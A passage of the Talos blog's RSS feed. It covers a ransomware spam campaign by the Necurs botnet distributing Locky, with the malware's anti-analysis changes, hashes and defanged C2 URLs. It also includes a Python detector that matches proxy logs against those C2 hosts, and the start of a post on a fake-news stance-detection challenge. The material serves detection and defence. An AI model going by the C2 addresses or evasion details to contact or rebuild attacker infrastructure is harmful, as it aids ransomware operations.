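    print(is_rejected(parse_oid, oversized_oid), is_rejected(parse_oid, huge_length))
    print(parse_general_names(names))
```

In a C implementation the same two comparisons belong immediately before the memcpy into the allocation and before each pointer advance; the point of the example is that both are decided on the received length, never on the size the parser expected.
]]>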
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/QAa9jYAi7gA" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-22T13:37:31.868-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/matrixssl-multiple-vulns.html</feedburner:origLink></item><item><title>Player 1 Limps Back Into the Ring - Hello again, Locky!</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/SX_JomJXrSM/necurs-locky-campaign.html</link><category>Coverage</category><category>Locky</category><category>Malware</category><category>Necurs</category><category>ransomware</category><category>spam</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Wed, 21 Jun 2017 14:00:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4633531550065695361</guid><description>&lt;i&gt;This post was authored by &lt;a href="https://www.blogger.com/profile/09794908020114943712"&gt;Alex Chiu&lt;/a&gt;, &lt;a href="https://blogs.cisco.com/author/warrenmercer"&gt;Warren Mercer&lt;/a&gt;, and &lt;a href="https://twitter.com/jaesonschultz"&gt;Jaeson Schultz&lt;/a&gt;.&amp;nbsp; &lt;a href="https://www.linkedin.com/in/seanrichardbaird/"&gt;Sean Baird&lt;/a&gt; and &lt;a href="https://blogs.cisco.com/author/matthewmolyett"&gt;Matthew Molyett&lt;/a&gt; contributed to this post.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Back in May, the Necurs spam botnet jettisoned Locky ransomware in favor of the new Jaff ransomware variant. However, earlier this month Kaspersky &lt;a href="https://www.bleepingcomputer.com/news/security/decrypted-kaspersky-releases-decryptor-for-the-jaff-ransomware/"&gt;discovered&lt;/a&gt; a vulnerability within Jaff which allowed them to create a decryptor. 
This turn of events seems to have caused the miscreants behind Necurs to scramble to distribute a different ransomware payload. Falling back on their old tricks, they have selected to re-distribute Locky ransomware. The malware is being transmitted via email using an .exe file encapsulated within two compressed .zip archives. &lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.z8rebvtqlj19"&gt;The Spam Campaign&lt;/h2&gt;The spam that is distributing this ransomware campaign is not significantly different from other ransomware spam campaigns that &lt;a href="http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"&gt;we have seen&lt;/a&gt; from Necurs. Ransomware-oriented spam campaigns from Necurs typically involve order confirmations, payment receipts, business documents, and so on -- all with the common goal of social engineering victims into opening the attachment. The messages Talos observed in this particular campaign are disguised as fake invoices.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-eyNiK605aRM/WUrZl2M0HkI/AAAAAAAABGQ/qwl28puJ1mcFIcja7euYAQG9YTqlqTQ5wCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="334" data-original-width="584" height="366" src="https://4.bp.blogspot.com/-eyNiK605aRM/WUrZl2M0HkI/AAAAAAAABGQ/qwl28puJ1mcFIcja7euYAQG9YTqlqTQ5wCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;An example spam message propagating Locky ransomware&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;a name='more'&gt;&lt;/a&gt;The volume of Locky spam Necurs has sent since the start of this particular campaign is notable. 
In the first hour of this campaign, Talos observed that Locky spam accounted for up to 7.2% of email volume on one of our systems. While the campaign has since decreased in the number of messages being sent per minute, Necurs is still actively sending messages containing Locky, though only in small quantities.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-O9IsDuPG5CQ/WUrZvGUQC2I/AAAAAAAABGU/xd8ggmw2doQ7iK2tb_5ztyE62QP4DqvegCLcBGAs/s1600/image3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="688" data-original-width="1459" height="300" src="https://1.bp.blogspot.com/-O9IsDuPG5CQ/WUrZvGUQC2I/AAAAAAAABGU/xd8ggmw2doQ7iK2tb_5ztyE62QP4DqvegCLcBGAs/s640/image3.jpg" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Chart illustrating the volume of Locky spam as a percent of the total email volume observed on one of our systems.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;h2 id="h.zcvqzzvyh9t2"&gt;Locky's Metamorphosis&lt;/h2&gt;&lt;br /&gt;Although they are using the same affiliate ID, for this particular round of Locky the attackers have altered their ransomware. We were unable to get the ransomware to encrypt data on any system running an operating system more recent than Windows XP. Upon further investigation, we determined that Data Execution Prevention (DEP) on systems running Windows 7 or later causes the unpacker to fail. Our analysis suggests that Locky has now added anti-debugging protection to its configuration: when a debugger is detected, instead of unpacking the configuration, the config pointer is directed at kernel32!AllocConsole, frustrating any attempts at analysis. 
In response to this new anti-analysis technique, Talos has updated &lt;a href="https://www.talosintelligence.com/lockydump"&gt;LockyDump&lt;/a&gt; so that it is able to extract the configuration information from this latest iteration.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-IO66iRUAo7Y/WUrZ4FmnYjI/AAAAAAAABGY/7fRBMyeOi8cz2CLZaNHTtO6-oEoyiWtUgCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="401" data-original-width="647" height="396" src="https://2.bp.blogspot.com/-IO66iRUAo7Y/WUrZ4FmnYjI/AAAAAAAABGY/7fRBMyeOi8cz2CLZaNHTtO6-oEoyiWtUgCLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Locky's unpacker crashes when trying to execute stack memory on systems more recent than Windows XP.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Another notable aspect of this latest campaign was the C2 URL structure. Adversaries behind this latest Locky campaign have reused the /checkupdate path as part of the URL structure -- the same URL structure found in &lt;a href="http://blog.talosintelligence.com/2017/04/locky-returns-necurs.html"&gt;previous&lt;/a&gt; Locky campaigns. 
This is perhaps another indication that the adversaries were hasty in developing and distributing this campaign.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-MA9D-Bh1-lg/WUrZ9bg40jI/AAAAAAAABGc/_6xzKOgRZ7MbQ0C0GYGn8g8KCz287zZjQCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="496" data-original-width="1600" height="198" src="https://1.bp.blogspot.com/-MA9D-Bh1-lg/WUrZ9bg40jI/AAAAAAAABGc/_6xzKOgRZ7MbQ0C0GYGn8g8KCz287zZjQCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Threat Grid sandbox run illustrating Locky C2 communication&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;h2 id="h.78ghl21h9l72"&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;This updated version of Locky appears to have been hastily deployed, and as a result it has not affected users running Windows operating systems other than Windows XP. The attackers behind this ransomware are likely already aware of this, so we can expect a fixed version of Locky to appear in a future round of Necurs' ransomware spam.&lt;br /&gt;&lt;br /&gt;Despite sounding like a broken record, we at Talos feel it's our duty to reiterate that it's always risky to click on links or open attachments in strange email messages. Users who fail to heed this advice can easily become ransomware victims, and if the subsequent ransom is paid, the monies will no doubt fund another round of attacks. 
As always, organizations are encouraged to make regular backups of their data, practice restoring said data, and store their backups offline, far out of the reach of potential criminals.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.a3tev2st7301"&gt;Coverage&lt;/h2&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on &lt;a href="https://www.snort.org/products"&gt;Snort.org&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-DHxZuOufEQc/WUraFLo0hiI/AAAAAAAABGg/Foaf5PPcddAqVgWF22XPw57vOihWGoxygCLcBGAs/s1600/image5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1341" data-original-width="1600" height="267" src="https://2.bp.blogspot.com/-DHxZuOufEQc/WUraFLo0hiI/AAAAAAAABGg/Foaf5PPcddAqVgWF22XPw57vOihWGoxygCLcBGAs/s320/image5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt;, and &lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt; can help identify hosts that have been compromised by Locky by detecting outbound C2 traffic.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html"&gt;Email Security&lt;/a&gt; can block malicious emails sent by 
threat actors as part of their campaign. &lt;br /&gt;&lt;br /&gt;Network Security appliances such as &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;NGIPS&lt;/a&gt;, and &lt;a href="https://meraki.cisco.com/products/appliances"&gt;Meraki MX&lt;/a&gt; with Advanced Security can detect malicious activity associated with this threat.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html"&gt;Stealthwatch&lt;/a&gt; detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.j7hdlx7kfxn9"&gt;IOCs&lt;/h2&gt;&lt;br /&gt;&lt;b&gt;SHA256&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;49184047c840287909cf0e6a5e00273c6d60da1750655ad66e219426b3cf9cd8&lt;/li&gt;&lt;li&gt;3285c3f37aa192a173f62fee82f7a966a6df6e5db4642d63a6784f39a63012b6&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Extension for Files Encrypted by Locky&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;.loptr&lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;Hard-coded Locky C2 URL&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;hxxp://185.115.140[.]170/checkupdate&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Locky DGA C2s (20th/21st June - DGA seed 65123) &lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;hxxp://emtsgdqsik[.]pl/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://tqathwvfaqfisj[.]pl/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://dqutujymgc[.]info/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://ddgtdcgoysuq[.]ru/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://lrsjplrlaceugxw[.]work/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://cstfxgujaf[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://gcbdwbtshl[.]xyz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://wxcjqfevrkosp[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://hllfhiqwneuwwx[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://agnfmqvhomsa[.]work/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://ythjvjhtgsfgesd[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://kabssqyef[.]info/checkupdate&lt;/li&gt;&lt;/ul&gt;&lt;div class="feedflare"&gt;
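<![CDATA[
As an added example, not part of the post or of any Cisco product, here is how the indicators above can be used to flag outbound C2 traffic in a web proxy log. The indicators are the defanged URLs published in the IOC section, refanged for matching; the log lines and their format (timestamp, client IP, method, URL, status) are constructed for the demo, and the DGA-looking domain qpwoeirutyalsk.biz is invented and is not an indicator. A request to a published host on the /checkupdate path is reported as a known C2 contact; a request to an unknown host on exactly that path is reported separately, since the DGA rotates through new domains while the path has been reused across campaigns.

```python
# Added example, not part of the Talos post: matching outbound proxy log lines
# against the Locky C2 indicators listed above. The indicators are copied from
# the post in their defanged form; the log lines are constructed for the demo.
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Defanged as published in the IOC section above (hard-coded C2 plus DGA C2s).
LOCKY_C2_DEFANGED = [
    "hxxp://185.115.140[.]170/checkupdate",
    "hxxp://emtsgdqsik[.]pl/checkupdate",
    "hxxp://tqathwvfaqfisj[.]pl/checkupdate",
    "hxxp://dqutujymgc[.]info/checkupdate",
    "hxxp://ddgtdcgoysuq[.]ru/checkupdate",
    "hxxp://lrsjplrlaceugxw[.]work/checkupdate",
]
C2_PATH = "/checkupdate"          # path reused from earlier Locky campaigns


def refang(url: str) -> str:
    """Turn a defanged indicator back into a matchable URL."""
    return url.replace("hxxp://", "http://").replace("[.]", ".")


KNOWN_C2_HOSTS = {urlsplit(refang(u)).hostname for u in LOCKY_C2_DEFANGED}

# Constructed proxy log format: "<timestamp> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST|CONNECT) (\S+) (\d{3})$")

# Constructed sample lines; qpwoeirutyalsk.biz is invented, not an indicator.
SAMPLE_LOG = """\
2017-06-21T14:02:11Z 10.0.0.21 POST http://185.115.140.170/checkupdate 200
2017-06-21T14:02:15Z 10.0.0.21 POST http://emtsgdqsik.pl/checkupdate 404
2017-06-21T14:03:00Z 10.0.0.33 GET http://www.example.com/index.html 200
2017-06-21T14:03:40Z 10.0.0.33 POST http://qpwoeirutyalsk.biz/checkupdate 200
2017-06-21T14:04:02Z 10.0.0.45 GET http://updates.example.org/checkupdates 200
"""


def classify(url: str) -> Optional[str]:
    """Return a verdict for one URL, or None when nothing matches.

    'known_locky_c2'    host is a published indicator and the path matches;
    'checkupdate_path'  unknown host but the exact C2 path, worth a closer
                        look because the DGA rotates domains daily.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.path != C2_PATH:           # exact path, so /checkupdates is not noise
        return None
    if host in KNOWN_C2_HOSTS:
        return "known_locky_c2"
    return "checkupdate_path"


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse log lines and return one alert dict per matching request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip lines that do not fit the format
        ts, client, method, url, status = m.groups()
        verdict = classify(url)
        if verdict:
            alerts.append({"time": ts, "client": client, "method": method,
                           "url": url, "status": status, "verdict": verdict})
    return alerts


def clients_by_verdict(alerts: List[Dict[str, str]]) -> Dict[str, set]:
    """Group alerting client IPs by verdict for triage."""
    out: Dict[str, set] = {}
    for a in alerts:
        out.setdefault(a["verdict"], set()).add(a["client"])
    return out


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["verdict"], alert["client"], alert["url"], alert["status"])
```

Note that a 404 from a published C2 host is still reported: the contact itself is the signal, whatever the server answered.
]]>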
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/SX_JomJXrSM" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-22T12:05:37.440-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-eyNiK605aRM/WUrZl2M0HkI/AAAAAAAABGQ/qwl28puJ1mcFIcja7euYAQG9YTqlqTQ5wCLcBGAs/s72-c/image2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html</feedburner:origLink></item><item><title>Talos Targets Disinformation with Fake News Challenge Victory</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/FtoD2o9EqnI/talos-fake-news-challenge.html</link><category>AI</category><category>artificial intelligence</category><category>data science</category><category>decision trees</category><category>deep learning</category><category>disinformation</category><category>fake news</category><category>false news</category><category>FNC</category><category>GBDT</category><category>machine learning</category><category>Neural Network</category><category>SOLAT IN THE SWEN</category><category>stance detection</category><category>Talos</category><category>Talos GitHub</category><author>noreply@blogger.com (William Largent)</author><pubDate>Tue, 20 Jun 2017 10:22:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-1322842482458115714</guid><description>This post was authored by&amp;nbsp;&lt;a href="https://www.linkedin.com/in/seanrichardbaird/" target="_blank"&gt;Sean Baird&lt;/a&gt; with contributions by Doug Sibley and &lt;a href="https://www.linkedin.com/in/yuxipanucla/" target="_blank"&gt;Yuxi Pan&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Executive Summary&lt;/h2&gt;&lt;br /&gt;For the past several months, the problem of “fake news” has been abuzz in news headlines, 
tweets, and social media posts across the web. With historical roots in information warfare and disinformation, “fake news” is a different kind of cyber-threat affecting people all around the globe. Using advanced machine learning and artificial intelligence technology, Talos researchers set their sights on this different kind of cyber-threat and beat out over 80 registered teams worldwide to claim first place in the &lt;a href="http://www.fakenewschallenge.org/" target="_blank"&gt;Fake News Challenge&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-fXzLj0mZDLs/WUlByfuNujI/AAAAAAAAAPA/RpwB6P67lCwNkGBhuEeCMuqvpD0G5kRGACLcBGAs/s1600/TalosInTheNews1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://1.bp.blogspot.com/-fXzLj0mZDLs/WUlByfuNujI/AAAAAAAAAPA/RpwB6P67lCwNkGBhuEeCMuqvpD0G5kRGACLcBGAs/s640/TalosInTheNews1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;&lt;a name='more'&gt;&lt;/a&gt;Context&lt;/h2&gt;&lt;br /&gt;&lt;h4&gt;Background&lt;/h4&gt;&lt;br /&gt;While there has been significant media coverage regarding fake news in the recent months, the modern fake news problem is rooted in a long history of information operations and disinformation campaigns.&lt;br /&gt;&lt;br /&gt;In a very in-depth &lt;a href="https://fbnewsroomus.files.wordpress.com/2017/04/facebook-and-information-operations-v1.pdf" target="_blank"&gt;paper&lt;/a&gt; about the topic, Facebook defines information operations “[...] as actions taken by organized actors...to distort domestic or foreign political sentiment, most frequently to achieve a strategic and/or geopolitical outcome [...]” and classifies “false news” as a useful tool in the information operations toolkit. &amp;nbsp;The paper specifies that “false news” is &amp;nbsp;“[...] 
news articles that purport to be factual, but which contain intentional misstatements of fact with the intention to arouse passions, attract viewership, or deceive.”&lt;br /&gt;&lt;br /&gt;Alternatively, the &lt;a href="https://www.wired.com/story/fake-news-challenge-artificial-intelligence/" target="_blank"&gt;Wired article announcing the victory&lt;/a&gt; describes fake news in a simpler manner as “[...] made-up news stories created to convert social media shares into page views, ad dollars, and perhaps even political traction.”&lt;br /&gt;&lt;br /&gt;Clearly, this is a difficult problem to solve in cyberspace, especially in a world where technology and social media can help amplify these stories to a much broader audience. &amp;nbsp;This prompted several researchers in academia and industry to create the &lt;a href="http://www.fakenewschallenge.org/" target="_blank"&gt;Fake News Challenge (FNC)&lt;/a&gt;. &amp;nbsp;The self-described goal of the FNC is to “[...] address the problem of fake news by organizing a competition to foster development of tools to help human fact checkers identify hoaxes and deliberate misinformation in news stories.” &lt;br /&gt;&lt;br /&gt;The first iteration of the challenge (FNC-1), which lasted from December 1, 2016 until June 2, 2017, focused solely on stance detection, a crucial first step in helping to detect fake news.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;FNC-1: Stance Detection&lt;/h4&gt;&lt;br /&gt;While actual truth-labeling is a hefty task, rife with political and technical issues, stance detection is a potential first step toward a more robust solution. &amp;nbsp;&lt;a href="https://twitter.com/deanpomerleau" target="_blank"&gt;Dean Pomerleau&lt;/a&gt;, one of the organizers of the challenge, explained in a &lt;a href="http://mediashift.org/2017/05/fake-news-challenge-puts-ai-test/" target="_blank"&gt;Mediashift interview&lt;/a&gt; that “[...] 
the goal [of stance detection] is to determine which has the best argument, not just which is the most popular or widely cited or read, the way a search engine does.”&lt;br /&gt;&lt;br /&gt;In the context of the FNC, stance detection can be defined as labeling the relationship an article body has to its headline/claim -- specifically, whether the body agrees with, disagrees with, or discusses the headline/claim or whether the body is completely unrelated. &amp;nbsp;Thus, the four possible outputs of a stance detection system should be “agree,” “disagree,” “discuss,” and “unrelated.” &amp;nbsp;An example of how stance detection could be implemented in a broader fake news detection system is available in the figure below:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-zhHTanVkyPY/WUlCGou3mmI/AAAAAAAAAPE/3WUSmliCWPQgv3yEi4Q2PUWhrBDrsngmgCLcBGAs/s1600/news_outets_dark2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="878" data-original-width="1600" height="350" src="https://2.bp.blogspot.com/-zhHTanVkyPY/WUlCGou3mmI/AAAAAAAAAPE/3WUSmliCWPQgv3yEi4Q2PUWhrBDrsngmgCLcBGAs/s640/news_outets_dark2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Stance detection’s role in fake news detection&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;Always interested in a challenge, the FNC piqued the interest of Talos researchers who chose the team name “SOLAT IN THE SWEN” as a clever anagram of their true affiliation. 
&amp;nbsp;Immediately, these researchers began development work on various models and solutions in their spare time -- models which would eventually net them a first place victory.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-hyzMJ3b0Sek/WUlZGUPPh6I/AAAAAAAAAQM/KwYQmxOjlg8xNTIsYZBrZD3mClaONm-GQCLcBGAs/s1600/talos-in-the-news_blog-bg3.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="150" data-original-width="830" height="114" src="https://3.bp.blogspot.com/-hyzMJ3b0Sek/WUlZGUPPh6I/AAAAAAAAAQM/KwYQmxOjlg8xNTIsYZBrZD3mClaONm-GQCLcBGAs/s640/talos-in-the-news_blog-bg3.gif" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;SOLAT IN THE SWEN - Talos’s covert team name&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;Our Solution&lt;/h2&gt;&lt;br /&gt;One of the goals of this challenge was “[...] to explore how artificial intelligence technologies, particularly machine learning and natural language processing, might be leveraged to combat the fake news problem [...].” Because of this, team SOLAT IN THE SWEN decided to test how various cutting-edge machine learning techniques performed. &amp;nbsp;After successfully implementing several different models, the team found that their results were best when combining multiple models in an ensemble. 
&amp;nbsp;The team’s final submission was an ensemble based on a 50/50 weighted average between gradient-boosted decision trees and a deep convolutional neural network. &amp;nbsp;The full code can be found on the &lt;a href="https://github.com/Cisco-Talos/fnc-1/" target="_blank"&gt;Talos GitHub&lt;/a&gt;, open-sourced under an Apache 2.0 license.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-W6Xph2kiuNo/WUlCa4y9C9I/AAAAAAAAAPM/LIHm718lW6YnPS3VGNzPZy3Lp5Ycr7jMQCLcBGAs/s1600/final_prediction_dark4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1021" data-original-width="1194" height="341" src="https://2.bp.blogspot.com/-W6Xph2kiuNo/WUlCa4y9C9I/AAAAAAAAAPM/LIHm718lW6YnPS3VGNzPZy3Lp5Ycr7jMQCLcBGAs/s400/final_prediction_dark4.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Our models were ensembled with a 50/50 weighted average&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Deep Learning Approach&lt;/h4&gt;&lt;br /&gt;The first model used by the team applies several different neural networks used in deep learning. &amp;nbsp;This model applies a one-dimensional &lt;a href="https://en.wikipedia.org/wiki/Convolution" target="_blank"&gt;convolutional&lt;/a&gt; neural net (&lt;a href="https://en.wikipedia.org/wiki/Convolutional_neural_network" target="_blank"&gt;CNN&lt;/a&gt;) on the headline and body text, represented at the word level using the Google News pretrained &lt;a href="https://code.google.com/archive/p/word2vec/" target="_blank"&gt;vectors&lt;/a&gt;. 
CNNs allow for efficient, effective parallel computation while performing The output of this CNN is then sent to a multi-layer perceptron (&lt;a href="https://en.wikipedia.org/wiki/Multilayer_perceptron" target="_blank"&gt;MLP&lt;/a&gt;) with 4-class output -- “agree,” “disagree,” “discuss,” and “unrelated” -- and trained end-to-end. The model was regularized using dropout (p=.5) in all convolutional layers. All hyperparameters of this model were set to sensible defaults; however, they were not further evaluated to find better choices.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-DkBKbpVM4w4/WUlCiFEVKTI/AAAAAAAAAPQ/NORk5w4GbS01iSLD1sCcrIlifuGNwvnUgCEwYBhgL/s1600/deep_model_dark5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="1440" height="640" src="https://1.bp.blogspot.com/-DkBKbpVM4w4/WUlCiFEVKTI/AAAAAAAAAPQ/NORk5w4GbS01iSLD1sCcrIlifuGNwvnUgCEwYBhgL/s640/deep_model_dark5.png" width="574" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Diagram outlining our deep learning 